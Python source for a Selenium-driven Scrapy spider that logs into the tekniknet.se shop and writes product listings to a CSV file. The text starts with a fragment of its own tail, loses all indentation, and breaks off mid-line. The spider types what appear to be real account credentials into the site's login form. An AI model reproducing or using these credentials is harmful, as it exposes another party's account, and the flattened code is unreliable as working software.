',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +
',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 14:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list4
[m] + '\n')
elif len(csv_image_url) == 15:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list4[m] + '\n')
elif len(csv_image_url) == 16:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 17:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + csv_image_url[16] +
',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' +
list4[m] + '\n')
elif len(csv_image_url) >= 18:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + csv_image_url[16] +
',' + csv_image_url[17] + ',' + ' ' + ',' +
csv_stock + ',' + list4[m] + '\n')
except Exception as e:
self.loggger.info(e)
self.loggger.info('error4')
file.close()
self.driver.close()
<|reserved_special_token_1|>
import scrapy
import time
import os.path
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from tempfile import mkstemp
from shutil import move
from os import fdopen, remove
from datetime import datetime
import logging
output_timestamp = datetime.today().strftime('%Y-%m-%d-%H%M')
log_output_file = 'scrape-order-images-{}.log'.format(output_timestamp)
class ProductSpider(scrapy.Spider):
name = 'tekniknet_new'
allowed_domains = ['www.tekniknet.se']
start_urls = ['https://www.tekniknet.se/#']
def __init__(self):
options = webdriver.ChromeOptions()
options.add_argument('--start-maximized')
self.driver = webdriver.Chrome(chrome_options=options)
def parse(self, response):
fh = logging.FileHandler(log_output_file)
fh.setLevel(logging.INFO)
logging.getLogger('selenium.webdriver.remote.remote_connection'
).setLevel(logging.WARNING)
logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)
logging.getLogger('selenium.webdriver.remote.remote_connection'
).addHandler(fh)
logging.getLogger('urllib3.connectionpool').addHandler(fh)
logging.getLogger().addHandler(fh)
self.loggger = logging.getLogger()
self.driver.get(response.url)
list1 = []
list2 = []
list3 = []
list4 = []
list5 = []
list3_categories = []
list4_categories = []
csv_categories1 = ''
csv_heading = ''
csv_stock = ''
csv_price_new = ''
csv_price_old = ''
csv_desc = ''
csv_article_number = ''
csv_image_url = []
old_product_url = []
WebDriverWait(self.driver, 20).until(EC.presence_of_element_located
((By.ID, 'email')))
username = self.driver.find_element_by_id('email')
username.send_keys('info@themobilestore.se')
username = self.driver.find_element_by_id('password')
username.send_keys('order88')
login = self.driver.find_element_by_class_name('button-confirm')
login.click()
time.sleep(5)
fh, abs_path = mkstemp()
with fdopen(fh, 'w') as new_file:
with open('tekniknet.csv') as old_file:
for line in old_file:
new_file.write(line.replace('NEW', 'old'))
remove('tekniknet.csv')
move(abs_path, 'tekniknet.csv')
with open('tekniknet.csv', 'r') as ins:
for line in ins:
old_product_url.append(line.split(',')[-1])
file = open('tekniknet.csv', 'a', errors='replace')
for wrapper1 in self.driver.find_elements_by_class_name('level-0'):
child_wrapper1 = wrapper1.find_element_by_xpath('./a')
link1 = child_wrapper1.get_attribute('href')
list1.append(link1)
self.loggger.info(
'*************************************************')
self.loggger.info(link1)
for i in range(0, len(list1) - 4):
self.driver.get(list1[i])
try:
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.CLASS_NAME, 'inner')))
for wrapper2 in self.driver.find_elements_by_class_name('inner'
):
try:
sub2 = wrapper2.find_element_by_class_name('subLinks')
child_wrapper2 = sub2.find_elements_by_xpath('.//a')
for child2 in child_wrapper2:
link2 = child2.get_attribute('href')
list2.append(link2)
self.loggger.info(
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'
)
self.loggger.info(link2)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
except:
try:
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.ID,
'categorySubCategories')))
subcategory = self.driver.find_element_by_id(
'categorySubCategories')
wrapper2_1 = subcategory.find_elements_by_xpath('.//a')
for child3 in wrapper2_1:
link2_1 = child3.get_attribute('href')
list5.append(link2_1)
for n in range(0, len(list5)):
self.driver.get(list5[n])
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.ID,
'categorySubCategories')))
subcategory = self.driver.find_element_by_id(
'categorySubCategories')
wrapper2_1_1 = subcategory.find_elements_by_xpath(
'.//a')
for child3_1 in wrapper2_1_1:
if child3_1.text != 'Visa alla':
link2_1_1 = child3_1.get_attribute('href')
list2.append(link2_1_1)
except:
try:
breadcrumbs2 = self.driver.find_element_by_id(
'breadcrumbs')
categories2 = breadcrumbs2.find_elements_by_xpath(
'.//li')
csv_categories2 = ''
for category2 in categories2:
csv_categories2 = (csv_categories2 + category2.
text + '/')
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.CLASS_NAME,
'listProduct')))
for wrapper2_2 in self.driver.find_elements_by_class_name(
'listProduct'):
wrapper2_3 = wrapper2_2.find_element_by_xpath(
'.//a')
link2_2 = wrapper2_3.get_attribute('href')
list4.append(link2_2)
list4_categories.append(csv_categories2)
self.loggger.info(
'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'
)
self.loggger.info(link2_2)
self.loggger.info('error')
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
for j in range(0, len(list2)):
try:
self.loggger.info('**********-------------- ' + str(j) +
' ******************************')
self.driver.get(list2[j])
WebDriverWait(self.driver, 30).until(EC.
presence_of_element_located((By.ID, 'breadcrumbs')))
breadcrumbs1 = self.driver.find_element_by_id('breadcrumbs')
categories1 = breadcrumbs1.find_elements_by_xpath('.//li')
csv_categories1 = ''
for category1 in categories1:
csv_categories1 = csv_categories1 + category1.text + '/'
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.CLASS_NAME, 'listProduct'))
)
for wrapper3 in self.driver.find_elements_by_class_name(
'listProduct'):
child_wrapper3 = wrapper3.find_element_by_xpath('.//a')
link3 = child_wrapper3.get_attribute('href')
list3.append(link3)
list3_categories.append(csv_categories1)
self.loggger.info(
'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'
)
self.loggger.info(link3)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
for k in range(0, len(list3)):
try:
if list3[k] not in old_product_url:
self.loggger.info('----------------------- ' + str
(k) + ' ******************************')
self.driver.get(list3[k])
WebDriverWait(self.driver, 30).until(EC.
presence_of_element_located((By.ID, 'breadcrumbs')))
offer = self.driver.find_element_by_id('productPageUpper')
try:
heading = offer.find_element_by_class_name('pHeader')
csv_heading = heading.text.replace(',', '.')
except:
self.loggger.info('heading3 non-exist')
csv_heading = ''
try:
stock = offer.find_element_by_class_name('instock')
csv_stock = stock.text
except:
csv_stock = 'Out of stock'
self.loggger.info('stock3 non-exist')
csv_stock = ''
try:
price_new = offer.find_element_by_class_name(
'priceRegular')
csv_price_new = price_new.text.split(' ')[0]
except:
try:
price_new = offer.find_element_by_class_name(
'priceNew')
csv_price_new = price_new.text.split(' ')[0]
price_old = offer.find_element_by_class_name(
'priceOld')
csv_price_old = price_old.text.split(' ')[0]
except:
self.loggger.info('price3 non-exist')
csv_price_old = ''
csv_price_new = ''
try:
desc = offer.find_element_by_id('pDesc')
csv_desc = desc.get_attribute('innerHTML').replace(',',
'-').replace('\n', ' ').replace('\r', '').rstrip(
).lstrip()
except:
self.loggger.info('description3 non-exist')
csv_desc = ''
try:
article_number = offer.find_element_by_id(
'pManufacturer')
csv_article_number = article_number.text.split(' ')[-1
].replace(',', '.')
except:
self.loggger.info('article number3 non-exist')
csv_article_number = ''
try:
pimages = offer.find_elements_by_xpath('.//img')
csv_image_url = []
for pimage in pimages:
image_url = pimage.get_attribute('src')
if image_url not in csv_image_url:
csv_image_url.append(image_url)
except:
self.loggger.info('image3 non-exist')
if len(csv_image_url) == 1:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 2:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 3:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list3
[k] + '\n')
elif len(csv_image_url) == 4:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list3[k] + '\n')
elif len(csv_image_url) == 5:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 6:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 7:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list3
[k] + '\n')
elif len(csv_image_url) == 8:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list3[k] + '\n')
elif len(csv_image_url) == 9:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 10:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 11:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list3
[k] + '\n')
elif len(csv_image_url) == 12:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 13:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + ' ' + ',' + ' ' +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +
',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 14:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list3
[k] + '\n')
elif len(csv_image_url) == 15:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list3[k] + '\n')
elif len(csv_image_url) == 16:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 17:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + csv_image_url[16] +
',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' +
list3[k] + '\n')
elif len(csv_image_url) >= 18:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + csv_image_url[16] +
',' + csv_image_url[17] + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
except Exception as e:
self.loggger.info(e)
self.loggger.info('error3')
for m in range(0, len(list4)):
try:
if list4[m] not in old_product_url:
self.loggger.info('********************** ' + str(
k) + ' ******************************')
self.driver.get(list4[m])
WebDriverWait(self.driver, 30).until(EC.
presence_of_element_located((By.ID, 'breadcrumbs')))
offer = self.driver.find_element_by_id('productPageUpper')
try:
heading = offer.find_element_by_class_name('pHeader')
csv_heading = heading.text.replace(',', '.')
except:
self.loggger.info('heading4 non-exist')
csv_heading = ''
try:
stock = offer.find_element_by_class_name('instock')
csv_stock = stock.text
except:
csv_stock = 'Out of stock'
self.loggger.info('stock4 non-exist')
try:
price_new = offer.find_element_by_class_name(
'priceRegular')
csv_price_new = price_new.text.split(' ')[0]
except:
try:
price_new = offer.find_element_by_class_name(
'priceNew')
csv_price_new = price_new.text.split(' ')[0]
price_old = offer.find_element_by_class_name(
'priceOld')
csv_price_old = price_old.text.split(' ')[0]
except:
self.loggger.info('price4 non-exist')
csv_price_new = ''
csv_price_old = ''
try:
desc = offer.find_element_by_id('pDesc')
csv_desc = desc.get_attribute('innerHTML').replace(',',
'-').replace('\n', ' ').replace('\r', '').rstrip(
).lstrip()
except:
self.loggger.info('description4 non-exist')
csv_desc = ''
try:
article_number = offer.find_element_by_id(
'pManufacturer')
csv_article_number = article_number.text.split(' ')[-1
].replace(',', '.')
except:
self.loggger.info('article number4 non-exist')
csv_article_number = ''
try:
pimages = offer.find_elements_by_xpath('.//img')
csv_image_url = []
for pimage in pimages:
image_url = pimage.get_attribute('src')
if image_url not in csv_image_url:
csv_image_url.append(image_url)
except:
self.loggger.info('image4 non-exist')
if len(csv_image_url) == 1:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 2:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 3:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list4
[m] + '\n')
elif len(csv_image_url) == 4:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
